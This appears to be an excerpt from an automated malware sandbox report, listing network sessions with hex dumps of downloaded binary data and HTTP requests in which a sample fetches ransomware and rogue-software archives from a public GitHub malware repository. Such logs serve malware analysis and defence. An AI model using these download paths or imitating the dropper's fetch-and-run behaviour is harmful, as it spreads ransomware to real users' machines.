                                                                                                                                                    2022-09-29 12:59:19 UTC28490INData Raw: 21 50 71 ce f0 0d 5f c5 4b 6c 3f 99 de 88 62 c9 9e 43 22 0e d5 40 82 a1 b3 16 90 17 f0 87 ee e2 b4 ec 71 0b ae 3e 60 ac ed 5a ca ff 0b 9a 2e 71 84 02 07 51 fb 0d 0e 00 ff 14 7d 6e 22 38 ce f2 c5 d9 26 2c 8a 35 10 38 e1 c2 a5 05 39 39 44 d2 5d ee 40 44 be 37 4e 12 42 e3 85 2c 55 69 b9 ac 8e 89 c3 49 8a 7b 65 5e d0 1a 1d d6 8c 05 f1 cf 64 0b 88 19 1d ef 91 5c 2c 1b c0 86 c8 b8 e8 2c 7d f7 b3 fb 9c ea 35 aa da b6 a6 3a 8d 20 3b 85 9e de a1 bd d5 1d e2 a6 5e 3c e3 2a 1c ea 3d ca 27 47 28 7b ee cc 4e c5 2e e9 26 4c 41 b8 63 70 30 34 a1 ae 4a d4 3f 27 45 b3 96 b3 56 33 83 c1 f4 43 44 6e c9 78 52 4b 74 ea 3f 57 ba 39 7b 5b 38 87 73 59 1a f5 8e fc 3f 2d 79 24 78 5d 2f 3b 72 57 e2 0a d2 0e 3a 81 92 3f a9 67 14 40 1c 9d 09 93 cc 5a be 41 31 ba 74 cb 60 09 b5 2a 6c
                                                                                                                                                    Data Ascii: !Pq_Kl?bC"@q>`Z.qQ}n"8&,5899D]@D7NB,UiI{e^d\,,}5: ;^<*='G({N.&LAcp04J?'EV3CDnxRKt?W9{[8sY?-y$x]/;rW:?g@ZA1t`*l
                                                                                                                                                    2022-09-29 12:59:19 UTC28506INData Raw: d5 b0 c8 cb 0d 2f cd f5 a6 43 a6 34 06 da a2 50 0f d7 dc 42 3f 17 f2 bb bb cd 16 57 2c 01 99 5d 39 f2 85 f0 66 bd 95 63 f2 d8 62 c1 ad 6f 3c b5 da 68 1e 4c 32 be a6 ac 99 a1 e1 2f 2c db aa 87 a7 27 bd 40 73 22 b9 8b 6e 6c 11 0e e7 c9 e3 e7 fb 8e 58 3b 40 38 1a f9 fb a3 1e 91 b5 22 2a c7 97 72 73 7a b4 ad 52 fb ba b1 36 ef 9f 29 84 a3 20 57 f0 5e 48 ef 4b 74 c4 ac 92 42 b4 8d b4 d5 bd 1d 35 b1 8a 4a ad 2f df ad dd 9e 51 02 f3 7b 50 59 8c cd b5 f4 9a 5f 92 5c 00 1b 7e 5b b8 b4 95 0b 53 bf ee 1c 59 c0 eb 74 ed 3a 05 ae 4d 9e 1b ed a1 40 6f fc 98 d4 c5 26 6c d4 06 f5 68 9d 19 fd d2 1e fb d1 86 d4 ca 92 fb e5 12 00 cf ee e9 ab 02 26 ea a7 5f 27 2d f4 c5 bb 84 58 78 2c ac 0d 5f c1 6a 3a 88 c4 e4 63 13 f2 a7 24 b7 32 eb 41 44 b5 64 b7 2e 9f 7b 3d a8 29 05 96 c2
                                                                                                                                                    Data Ascii: /C4PB?W,]9fcbo<hL2/,'@s"nlX;@8"*rszR6) W^HKtB5J/Q{PY_\~[SYt:M@o&lh&_'-Xx,_j:c$2ADd.{=)
                                                                                                                                                    2022-09-29 12:59:19 UTC28522INData Raw: d2 c2 b9 ad b0 de ad 71 ea ab 17 d3 97 1f 3c 92 1f bd 10 ab 81 7c 7c 03 1f d9 f4 31 fc 37 f3 b1 1c 7a 46 05 d8 94 b2 9a bf 96 d9 a4 eb 7c 07 43 74 c5 97 6c bc 99 41 70 7e 06 72 ca 63 bb 16 05 d5 e9 f8 dc 16 c8 65 d8 44 29 0e e2 a0 10 2b 09 9b be 7f d1 70 9a ce d6 af fc b9 00 10 51 d0 41 e1 bc 7a 6b 10 cc 22 19 b5 93 67 56 e1 9f 52 eb df b3 76 46 92 70 8b 8e b5 38 fd 41 6e 4b 14 fa 29 69 73 20 72 6a b0 8a bd f1 64 ca a2 bc b3 8e 04 e5 4c 9a 44 7f cf 93 e1 9e 74 23 90 8f 49 82 4f db 65 1b f9 0f 10 3d 7e dc 77 10 f2 b3 3d ae bd 1d d6 b4 74 06 e5 3d 1b 32 a5 76 08 5c 66 5b 58 33 04 c5 31 3a d2 7b 9b cc c1 4c a3 98 ab d5 8d 76 02 7a 2c bc db 3b 75 7f ca 65 19 0f 4f 6e 64 19 b6 16 1a 16 6c a2 d4 18 ec ed d5 42 1d 85 8e 38 bf 99 46 de 76 81 41 d2 fd ae f1 88 0d
                                                                                                                                                    Data Ascii: q<||17zF|CtlAp~rceD)+pQAzk"gVRvFp8AnK)is rjdLDt#IOe=~w=t=2v\f[X31:{Lvz,;ueOndlB8FvA
                                                                                                                                                    2022-09-29 12:59:19 UTC28538INData Raw: 2d e3 bc ff b0 00 74 40 27 e7 45 c9 79 7d 86 4c 9b ed 03 ce e4 c1 e2 8e 34 5a 8e 4f 3d c9 7e 6f e4 56 6f 00 b5 6d 7d c7 1b b9 ac 35 13 d3 7b 1a 30 52 ef 15 c3 3b ff 4a e5 42 f7 d6 61 24 ff 40 6c 7c e2 48 76 51 c9 10 be 8d be 07 8d a3 6a a4 84 34 57 e4 dc b9 fb 68 6a 4b dc 0d 2a ac 1d 89 e1 83 54 ce 91 e9 13 10 8b a0 55 f5 58 1a d0 48 68 05 71 a3 88 a2 62 fe 09 e9 dd c5 9c fa e0 09 a9 36 a9 cb 5d 4f f2 fe 4e 3d 0f 5c 2b e4 4e 50 3a bc fd 3e d5 f0 5e 78 91 39 b2 ee ea fb 15 b2 0c d8 c9 20 fb ce 3a 9e 0d 69 69 ac d2 32 06 fb ba 71 6a 88 3e c9 0c cb e4 83 10 13 54 5a cb a8 e9 7c fa 85 bf a7 64 88 d4 6e 4e be 3b d8 53 ce 87 ac 92 45 13 c9 a7 ba 5e 0d 0c d3 22 29 d1 30 fa bf 1d 18 ae 30 d1 c2 03 be 9d c2 9b c1 85 ea ab 4f 4d 58 67 d7 79 ea 98 f4 5b 95 d6 98 85
                                                                                                                                                    Data Ascii: -t@'Ey}L4ZO=~oVom}5{0R;JBa$@l|HvQj4WhjK*TUXHhqb6]ON=\+NP:>^x9 :ii2qj>TZ|dnN;SE^")00OMXgy[
                                                                                                                                                    2022-09-29 12:59:19 UTC28554INData Raw: 96 90 7c 15 bb 8c ac 3e c2 c5 fc 3a 74 ca 69 03 d9 5a 43 49 92 ab 79 42 97 f9 b8 50 13 1d 75 1e 76 d9 41 4a 18 4b ef ce 67 0a 63 f5 39 1f b2 14 2c d2 e5 ff b4 a6 6e 8a 99 dd e5 b2 95 af 09 f4 90 e9 47 49 78 73 a5 32 ec 9c e9 bd ed ca 91 98 70 8a 76 99 e2 c9 c9 1c 34 41 01 1d 9b e5 ba 89 c0 8c 54 6d 7f 7c 59 32 e3 9b 7c d6 40 ac 10 19 2d c3 e7 ac 03 c8 b3 1d 7c a8 68 98 b4 3c 82 f6 eb 62 e9 19 64 d9 0b b8 59 93 22 60 f5 46 b6 fe c5 0c bc c3 39 9f d8 42 0d 56 dc 7d c2 b9 81 81 91 4b 3d db 54 0d 95 b7 ae 54 20 67 8e fc de 56 b8 31 ce 06 6b 6f 64 1a c2 2a 86 88 69 0e ce f0 e7 76 05 44 0d e4 11 20 ca 6c 37 3f 98 90 d8 63 94 08 58 d0 bc d2 c1 64 af 09 16 e7 17 97 5a 4f 0b eb 36 69 32 4b 51 45 58 4e f8 55 6e ff 83 e0 24 75 3a 01 7a 8c 87 c6 0c 63 82 d6 9b 8c 70
                                                                                                                                                    Data Ascii: |>:tiZCIyBPuvAJKgc9,nGIxs2pv4ATm|Y2|@-|h<bdY"`F9BV}K=TT gV1kod*ivD l7?cXdZO6i2KQEXNUn$u:zcp
                                                                                                                                                    2022-09-29 12:59:19 UTC28570INData Raw: 11 5e d5 6f 4c 66 8b 7a c0 97 eb 12 51 fb 59 99 17 cb fc b6 3c 1b a2 33 3d d9 d1 bd 2d ff 9b 26 d5 d4 de 00 1e ff 0c ad e6 14 e6 bd 8e ca cc 92 78 2d c5 d2 03 c7 57 6a 18 e6 08 8c f5 aa c5 56 c3 31 9e b8 9d d1 bf f3 c2 6d e2 1d c9 bd 6b 02 0f cc 80 2b 25 fc f1 8b cf 0e ca 3a f3 d7 5f e6 06 a0 fa 08 6e 30 54 e8 bf 2e 54 91 4d b8 7b c8 3b 84 fa 94 f5 ef 45 1f 00 f1 23 e0 40 aa da 68 fa a5 df a2 a1 e6 77 6c 7c 9c 45 1b eb 0d 98 11 ef 77 bc 08 81 07 3b 8b cd 2c 01 ad 62 00 b0 25 0e 58 9c 21 ef 71 7c e1 76 2c 75 d2 50 19 3c 82 72 3f 02 8e 2b 00 5b b7 4d 93 45 5b f6 dc 7c 68 10 84 4c 14 b8 6e 9e e8 5c ab 37 96 78 1a 1f bc 81 4d a8 24 cf 9b c1 b9 93 69 89 dd 1e c9 33 8a d9 3b 41 a7 31 16 af ab 3f ae 65 70 f5 5f 12 b5 f9 6d 24 35 1f 27 60 10 95 b8 68 7a 3e 0f 26
                                                                                                                                                    Data Ascii: ^oLfzQY<3=-&x-WjV1mk+%:_n0T.TM{;E#@hwl|Ew;,b%X!q|v,uP<r?+[ME[|hLn\7xM$i3;A1?ep_m$5'`hz>&
                                                                                                                                                    2022-09-29 12:59:19 UTC28586INData Raw: 38 c5 01 71 d3 4a 1f 50 89 95 12 20 11 cf 69 0c 00 53 36 0d e1 4b d8 a7 58 5c 96 9b 51 c8 41 dc 30 11 fa f5 7b c3 bb c6 0b 6d e8 92 ca 02 3b 3b 06 86 6f 16 45 d0 99 02 60 87 59 8d 82 2f 6d eb 2c 13 cb 8d f4 48 b7 7c 6b 2d ae 3c c8 f5 e3 62 d2 1f c5 cc 73 f4 5e 00 12 d5 6e 5d 49 48 a0 2e f1 ae 2b f4 92 47 2f be 35 46 de 2c 9c 3c 1e a7 6c 24 14 e5 33 7c 2b 43 ad 4a ca d8 b4 30 76 b0 9e c0 01 fb d3 ea c1 98 e3 2a ab 61 80 36 d0 0d f7 88 fa ad bd a7 be c7 94 41 9d 9d 88 d1 15 10 71 88 dc 75 fd f5 a5 f0 ea b7 5a c2 dd a5 2d cd e9 57 1f 57 d3 39 a9 3d 03 40 c4 23 bd c1 c6 67 71 96 7c 99 e7 f9 81 33 f4 06 5d c0 f8 c9 bb b5 8d 6f 70 8c c1 c3 da b5 b1 ae a7 ff aa 3f bc 50 f2 fe cb 29 86 43 cd ed 02 72 a3 c0 d7 e0 15 5c cd 80 40 61 f6 07 a6 84 fa 9c 66 28 9d d0 45
                                                                                                                                                    Data Ascii: 8qJP iS6KX\QA0{m;;oE`Y/m,H|k-<bs^n]IH.+G/5F,<l$3|+CJ0v*a6AquZ-WW9=@#gq|3]op?P)Cr\@af(E
                                                                                                                                                    2022-09-29 12:59:19 UTC28602INData Raw: 45 8a c9 20 77 92 13 1e 9e 81 bd d0 ee f7 9d 7c 9d a7 57 31 71 85 cf 38 f5 d7 1c 45 f0 5a e0 52 7b 1c b2 e2 62 54 da c0 19 e8 79 90 c0 f2 b9 97 67 fe f2 02 1f 87 49 61 8d 9d 85 55 5f b3 16 fb 98 3a 5b 58 79 8d 15 9c 08 3f 8f ac 1a 50 5a 01 03 9e df 66 7e c2 4f ab 99 cd 9d 4d 26 2b a0 17 ba 76 fb 57 e8 9b 26 bd f0 50 26 9c ec f2 ec 90 c1 d7 02 3d 84 64 6b d5 ea b2 84 0d d4 90 81 de 8e c4 42 78 da 82 0f cc 79 12 d5 f4 df ff 76 02 f8 c7 2f 4d 25 57 56 8a f8 17 33 5a be 1c fc 72 72 be e4 5f 76 1b dd 47 c2 cf f6 6d 45 32 74 80 e1 0b 6f 90 4f bb 2b 73 c0 44 00 2e 04 96 3b 06 00 c2 b2 2f f8 ca 9b 3d 9e a9 82 18 2d 5c 92 e6 b1 2c 8c 1a 20 a2 7d 55 9a fb 4d 5c a1 07 69 5c de fd 6a d1 09 fc fc 3e 0c b4 56 07 58 b7 34 26 47 3f 04 d9 b8 a2 14 e3 d8 ac a5 e4 14 0a e5
                                                                                                                                                    Data Ascii: E w|W1q8EZR{bTygIaU_:[Xy?PZf~OM&+vW&P&=dkBxyv/M%WV3Zrr_vGmE2toO+sD.;/=-\, }UM\i\j>VX4&G?
                                                                                                                                                    2022-09-29 12:59:19 UTC28618INData Raw: 39 40 79 67 dd 6b f8 16 53 81 76 41 94 25 cd 0e 03 e4 d1 02 e4 86 7b e6 dd 98 b6 f0 ea 55 c8 64 0f 71 ae 0f f4 26 22 1f 65 c8 03 b3 81 59 fe b5 b0 c9 95 4e 55 62 ef 60 6c 5e 27 68 fa 85 c7 16 6e 0c 1b e3 86 44 e7 0e f4 46 a7 b7 56 bc d2 ae e1 2e 72 a1 18 31 f8 37 fd 65 09 ff f7 d6 c5 0b 28 54 a5 aa 41 78 47 f2 8a bf 2d d7 61 8c 0a b8 e4 19 f7 99 e8 66 23 36 1f 05 9d 88 aa c3 7f ae 2a 6a ba b8 90 f3 a0 1a 39 f7 4a 1d 91 5a 4d 0b c6 89 5c e3 8c 8b 64 64 9d 91 cf fc bb 8d c5 7f 3d 44 ed c4 fa e1 18 2e f2 02 04 0e 3c 15 21 e8 85 a1 d2 5e e3 f5 5a 07 67 76 84 fc 2f ca 02 f1 6e 34 5a 12 db 5e 9a cc a2 89 82 63 df db 70 a9 10 85 aa b4 1c 1b fa 1c 8f f9 64 18 cd 0a 99 6c ca 2d 26 66 45 a1 51 e2 ad 56 bc 32 79 2d 72 e6 8d e3 52 3c 74 49 b4 3e c8 18 e3 38 fa 06 dc
                                                                                                                                                    Data Ascii: 9@ygkSvA%{Udq&"eYNUb`l^'hnDFV.r17e(TAxG-af#6*j9JZM\dd=D.<!^Zgv/n4Z^cpdl-&fEQV2y-rR<tI>8
                                                                                                                                                    2022-09-29 12:59:19 UTC28634INData Raw: ab c6 4a b1 4d ae fc d2 68 df 14 14 00 09 8f a1 d7 e0 e4 c9 62 24 4e 09 d3 ec 4d 60 2c ef 1b aa 79 54 b1 19 ad 40 7b be 40 53 f0 be f8 4f c3 e5 94 f0 a8 92 97 27 38 39 62 f8 65 2d 5c 2c 81 50 97 d8 7c 20 c4 4f dd 92 c3 5f df 13 bb 39 b0 0b 28 61 29 a7 92 a7 cb e6 9a 15 7c 40 ea 31 45 ae 99 eb 11 86 18 a2 ac 74 e4 1f 49 f8 62 ab 0d f8 8c e2 4a 4f 3b 6d c1 fb 65 43 82 91 61 77 9b 66 22 61 fe 90 f2 78 04 ea 1d fd b0 29 6c 52 53 14 c6 19 76 c9 98 40 46 97 cc 60 2c fe be 87 20 1c 24 b6 c6 2a fe d6 6d 7b 8b c6 a9 de 8d e8 ef 41 4f 96 78 a0 9a 79 e1 61 be 34 96 35 a4 d2 98 36 80 d2 c6 37 21 ae 4c bb b3 55 2a 25 99 a6 de 99 d6 50 41 39 2e a5 56 7c 88 9a 68 cb ca 03 2d fb 52 47 ab 16 70 62 d4 ef 8b f4 33 69 bb 62 e1 b8 70 15 6b fe be a3 7d ca b8 f7 27 a7 8e a4 c6
                                                                                                                                                    Data Ascii: JMhb$NM`,yT@{@SO'89be-\,P| O_9(a)|@1EtIbJO;meCawf"ax)lRSv@F`, $*m{AOxya4567!LU*%PA9.V|h-RGpb3ibpk}'
                                                                                                                                                    2022-09-29 12:59:19 UTC28650INData Raw: ee 3d cc 59 22 64 b3 13 34 16 7d 9f 9d c1 a5 44 02 b5 4d 3d 6e e7 f9 8d d8 b3 8a 34 ae 09 75 85 85 0f 30 31 3c 7c 8e ab 1c bb a5 ec 1e fa f9 80 39 ec 45 76 63 f6 21 f2 c7 bc ad 08 84 e9 e2 04 ec 88 75 6b e2 bd b5 74 67 2f 7d bb 40 35 8a b7 13 a0 15 44 4b 14 2b 86 27 fe 03 03 f1 d4 9f 39 3c 2e c7 ea 1f c3 b9 fc 98 61 83 70 ed ab fd 2c 4f 55 58 37 f9 2c 0e 58 53 f8 af e0 23 5f 17 ee fa 85 40 80 5e 55 cb 84 f8 a6 a5 08 e7 ea 62 0e ae bf 0b 0f cf b0 bc 05 6b 75 a8 af e2 43 2f 51 a7 50 c2 e0 a0 00 44 17 31 d0 de 97 91 fa ff 22 62 6b 74 ca 59 6e 7e 80 d1 84 2a 56 33 e2 1f 92 d2 2c b9 69 95 e8 3d 42 61 72 e8 b2 73 7b ab dc e7 37 df 7d 6a 52 5c 33 a4 da c9 9c 7e f8 9a bd 4a 15 88 06 c8 c0 ca f4 89 9f ac 29 6c 3a 26 82 bc ba b4 1c 94 14 2c 09 24 17 36 55 ad 7b 09
                                                                                                                                                    Data Ascii: =Y"d4}DM=n4u01<|9Evc!uktg/}@5DK+'9<.ap,OUX7,XS#_@^UbkuC/QPD1"bktYn~*V3,i=Bars{7}jR\3~J)l:&,$6U{
                                                                                                                                                    2022-09-29 12:59:19 UTC28666INData Raw: 2a 0a dc 39 21 0c 09 9a cd 16 3f 78 d3 19 c2 ec fc 61 a8 bd 00 6b 6e 4c 19 4c fd ba ad 61 53 23 64 48 92 56 f2 49 c2 4e 04 51 22 15 86 a3 6d 6f 80 0a 3f 10 5b 89 7e d3 e1 e6 c0 8d 67 42 4d e2 67 2a 1f 16 20 e6 9b d2 53 32 a6 61 db ff 22 f0 34 5a 33 35 65 d8 da 18 43 e5 7f 44 b9 aa a1 90 f8 5e af c8 3e c1 ec e7 5b bb 76 e2 4b 0b 2a 66 cb 6e c1 2b 89 2d e6 1c c8 96 44 e6 89 fa 47 4f 31 3c 9a b3 63 e6 10 49 6b f9 10 5e 07 69 d5 88 fd 52 6c 24 c6 95 fa 84 a5 31 ca 53 92 99 ff b7 c7 de 29 87 42 76 1a 05 6e 7d c1 77 0c 8b 05 c0 93 d0 67 c6 6b 64 b8 b3 79 9d 6c 27 62 8c fd dd 3d 4a e3 22 54 db a9 ea 74 25 05 0b 65 b8 ea c2 a2 36 d0 5c cd 93 c0 c7 3d 0d 28 3a 0a 93 41 54 30 61 c6 55 7e b0 2f 33 7b fe 4d a2 8a f1 53 40 ec 8c 98 01 57 d1 e5 a0 f1 99 03 81 38 7e 7f
                                                                                                                                                    Data Ascii: *9!?xaknLLaS#dHVINQ"mo?[~gBMg* S2a"4Z35eCD^>[vK*fn+-DGO1<cIk^iRl$1S)Bvn}wgkdyl'b=J"Tt%e6\=(:AT0aU~/3{MS@W8~
                                                                                                                                                    2022-09-29 12:59:19 UTC28682INData Raw: 0e af d4 ac 8b 2e 08 4a 43 22 06 01 0d 88 80 19 41 ec 6d 34 10 16 58 01 5f d8 5c 4d 03 98 e6 ba 26 ab 4b 80 6b 3d 8a 02 8a de bc 1f 46 cb d8 22 9b 85 2f 7c 4f c6 57 2c 07 50 22 d3 ab ac 86 aa 08 e2 84 b4 0c 98 16 fb d1 56 01 4f 0f 80 83 75 ce 5a 3b 63 74 80 a2 d7 99 62 6f 48 ff 3c 68 8e 0f 68 86 8f 84 34 2e cd 58 bd 23 27 55 0d e6 56 53 0d 37 17 a4 d0 f7 cc e0 50 ed 92 d7 76 d9 aa b8 12 a5 03 bc 14 39 82 c8 ba 27 d6 df 59 14 55 54 67 76 16 28 1a f3 70 24 6b 85 dd fa 1e 3f fe 4c 7f 06 dd a0 9b 99 4a 05 da 9b ba 72 cf 63 30 79 5b 8a 2f cf df 8b b2 f5 93 36 da 4e ea 0f 12 f4 60 fc 5b be 52 a4 87 4f cd 61 6f 66 4b c3 83 7c 92 2d 76 70 23 b1 ce 59 84 6a a1 de fc 01 4f 3c 6f 82 ea 01 48 c9 7b 99 93 74 27 4d a8 7e 89 66 e1 57 ac 4f 1a b2 3f 21 c3 cc c7 81 4f 10
                                                                                                                                                    Data Ascii: .JC"Am4X_\M&Kk=F"/|OW,P"VOuZ;ctboH<hh4.X#'UVS7Pv9'YUTgv(p$k?LJrc0y[/6N`[ROaofK|-vp#YjO<oH{t'M~fWO?!O
                                                                                                                                                    2022-09-29 12:59:19 UTC28698INData Raw: 9c af 25 de df 08 dc 25 7c e8 00 99 30 f5 33 95 7b 5f 28 c9 70 1c 14 b1 f1 a9 72 ca 9d c6 b8 74 07 16 5f 9f 57 6a 49 88 34 de cc 33 22 d1 1f d9 f8 db 7d 79 91 e1 20 71 53 b9 f7 d2 16 2b 9c f2 e6 8e ba 4b f1 fd 76 18 85 59 f5 91 ce 14 cb 39 97 86 2e 52 52 99 e7 1b 31 1e 9a 57 35 13 33 a2 26 59 3e b3 43 51 dc 5c ff 43 30 ec 64 92 d1 05 8f 7f 5b f2 ac b0 ab f7 03 18 2c 56 2d a4 a1 ab 3c e1 61 70 6d 89 b6 1c be 27 a3 2d cb c7 7f 4f 55 3a ad b4 43 e2 67 31 1c 76 c9 ee c3 df fe 88 15 ed eb c5 6f b6 c1 b5 03 8e 0a 1f 86 cb f1 c6 c2 41 f0 6e 8e 45 b3 85 38 85 a4 3d 74 98 c9 b3 cc 3f 70 73 2e 31 c4 29 86 86 ef 68 3f c5 1b 63 ed 96 6e b9 20 f3 d7 20 f3 15 8e dc 6c 9d e6 de 60 d5 4a a3 47 d3 20 d0 83 b0 e1 2c 7f d5 03 68 79 01 5e 26 15 a4 cf 6d bb 7a 60 ac 17 03 63
                                                                                                                                                    Data Ascii: %%|03{_(prt_WjI43"}y qS+KvY9.RR1W53&Y>CQ\C0d[,V-<apm'-OU:Cg1voAnE8=t?ps.1)h?cn l`JG ,hy^&mz`c
                                                                                                                                                    2022-09-29 12:59:19 UTC28714INData Raw: 40 87 15 a8 df f8 a6 4c 89 81 64 94 73 5c ff 76 42 76 ae 97 20 57 a4 fd 28 04 a4 65 10 23 77 58 53 f6 80 40 3b 9c e4 42 b1 10 f8 c7 78 fa 37 9c 22 12 f7 63 b2 b6 76 a2 10 be ae 07 f4 0a 41 56 13 ec ca f3 00 2b 24 60 9c eb 6c ae 30 12 96 e0 99 b4 f3 65 39 5c 5b 52 95 12 80 9c 3d 73 dd 93 2c 01 37 a6 af 09 29 c2 46 1a 83 bd de 95 a5 51 0f cb 35 cc 61 32 40 b7 89 d7 2a 20 0e f0 1b 7b 83 9a ac eb 42 29 5a e9 70 29 38 c9 64 bc 53 a4 9a da 5d 18 f7 01 89 b8 c8 c4 48 2f 46 4e 0f d1 1a b0 c4 6a 46 f7 fc 67 fe e9 ab 31 8a 3e 82 e7 0c 00 29 df b6 62 85 10 9a cb 77 5b 89 6f 12 b7 01 bf 38 29 71 7f ec 5c ce 33 f0 dc 00 7c 24 d5 17 1f 8e e2 ac 91 58 d5 27 8d 82 d0 89 4b 2e 17 8b 79 5b bf 52 62 f1 4a 04 b1 bc eb 62 51 b1 18 c1 e7 cb f7 fe cc 95 0c a6 a3 71 96 cf 73 57
                                                                                                                                                    Data Ascii: @Lds\vBv W(e#wXS@;Bx7"cvAV+$`l0e9\[R=s,7)FQ5a2@* {B)Zp)8dS]H/FNjFg1>)bw[o8)q\3|$X'K.y[RbJbQqsW
                                                                                                                                                    2022-09-29 12:59:19 UTC28730INData Raw: 6f 44 7e da ad c7 45 24 4c 40 09 d5 d1 9d c8 de bd 0f d8 5c ec 85 4f b9 77 5b e2 47 86 e1 2f 6c fd 0d 18 ce e4 5d ec 34 ce 2d 68 6e da df 30 07 28 67 3b 57 74 39 6a 10 e5 cd 86 9d 8b 81 a1 4a 5f 18 39 3c e5 a2 15 b3 47 8b b7 4c 7b 08 b8 63 b4 1e 5c 26 c4 2a 25 8c a8 7c 58 b3 49 d0 68 1a 28 c1 f6 1a a3 0a a2 d9 f9 df 1c 8f dc b1 5b 45 d8 28 7d 25 04 36 c5 56 f8 37 e0 7b 34 c8 c9 f2 ce 70 73 c8 6b d4 8a 35 d9 34 72 3c 4f bc 0f 61 1c 8f 71 c0 53 52 9d 07 02 87 bb dd 9b b4 a8 4c ca d1 73 6c 04 e4 0a 12 8e a4 5b f2 92 01 3d cd d2 3b 8d 12 b5 8e 4b 6c 39 fb d9 97 d0 1e 29 5c 70 0b ef 03 88 5c a7 a3 1e 42 15 55 66 b6 61 a6 36 45 d0 98 c7 fd 93 5f e1 f9 80 d3 57 a5 68 93 0a bb f0 fa a8 cf ba 5c 1f f5 00 a0 5f c9 81 8b 9c 61 e4 3b b2 60 21 45 36 34 35 f5 d8 2a 48
                                                                                                                                                    Data Ascii: oD~E$L@\Ow[G/l]4-hn0(g;Wt9jJ_9<GL{c\&*%|XIh([E(}%6V7{4psk54r<OaqSRLsl[=;Kl9)\p\BUfa6E_Wh\_a;`!E645*H
                                                                                                                                                    2022-09-29 12:59:19 UTC28746INData Raw: 54 79 5c d1 ce 7f af 19 bc 63 aa 3d 63 27 ff fe 32 e7 ba 26 c4 18 c4 0f ef 2e 78 90 61 a0 d2 ce c9 fc b4 c7 a3 81 76 07 7b 91 5e 0a 9a cd 73 44 d4 1a ad 56 83 28 d2 00 b3 4a 21 04 8f 8e a3 36 87 e0 5a 9d 8d 2a cd 04 ca 10 fa 74 2a 1a a6 49 39 07 ec ad 75 ca 8e 87 74 69 64 9b 35 95 86 42 51 87 c7 c0 8c 51 1c f6 f9 41 1b 5f 50 bf bb a8 55 a3 45 d0 7c cc 29 47 ce b1 76 11 af b9 0e d5 16 42 aa a3 93 ee 6f ad 57 44 c9 3d e0 42 2a 49 97 6a e0 f9 68 ca a3 5d 5e 52 ad 3c 05 d0 df 8e 9d 0f ff 24 fc f1 11 68 81 d9 26 97 2e bd 43 94 5a 11 9e 4e 2b 67 df e9 71 0b 3f 78 a8 9a 44 3a ae b9 23 90 6a df f9 ec 9e aa 80 98 ec df 6c 23 a4 21 49 78 e0 79 74 71 75 86 f3 89 d6 69 86 d0 df 69 75 69 fd 85 b3 5c a1 69 ab fa 95 d3 f2 28 c5 4d d3 8d e4 9a 20 b3 2a 7a 02 1f b0 8c 72
                                                                                                                                                    Data Ascii: Ty\c=c'2&.xav{^sDV(J!6Z*t*I9utid5BQQA_PUE|)GvBoWD=B*Ijh]^R<$h&.CZN+gq?xD:#jl#!Ixytquiiui\i(M *zr
                                                                                                                                                    2022-09-29 12:59:19 UTC28762INData Raw: 7f 5b 40 a3 df 7f 03 17 7d b2 a4 2d aa dd 57 06 2e 14 94 7b 64 4d ce ad f6 69 72 6e 15 5d e7 76 16 b7 d9 be 9b 94 4f e7 b1 6a 16 d7 35 22 d0 08 1e 3b 2f c0 04 5e 35 1b 1e ff 02 1f 78 87 e4 b5 9f 2e 75 f0 0b 00 3c 7e 62 42 6d 36 dc 92 d6 5b ae 39 9b 30 ab 97 ba 74 47 aa c2 b7 c9 cc 80 2b e9 29 59 bb d0 12 63 ef 66 e0 1f f3 d1 e2 81 13 73 96 b9 db 83 3b d4 54 38 f6 61 1e 67 cf 6a 90 15 41 20 fe a2 a1 5f f7 73 3b ae 89 67 7e 59 05 f7 98 34 5d d3 49 7a c8 90 86 af f5 0b 78 f2 b2 e5 d0 bd 1b ec 06 8f be 4a a5 a8 c5 a2 e8 f9 51 9c 33 4f ef 53 8d 73 74 a3 39 d6 85 e0 76 85 9f fe d8 0b ae c0 9d 57 91 c6 c2 c2 c4 24 06 68 1b 9e 37 8c a6 51 fd f1 e2 48 f8 38 56 13 41 02 fe df fa 02 bb d1 59 52 2f 04 78 82 60 07 f0 61 3e d4 4f e2 17 df 7d 63 3e cb 26 8b ff 20 b2 2a
                                                                                                                                                    Data Ascii: [@}-W.{dMirn]vOj5";/^5x.u<~bBm6[90tG+)Ycfs;T8agjA _s;g~Y4]IzxJQ3OSst9vW$h7QH8VAYR/x`a>O}c>& *


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    109192.168.2.349762140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:19 UTC28774OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    11192.168.2.349713185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:52 UTC588OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    110140.82.121.3443192.168.2.349762C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:20 UTC28774INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:20 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
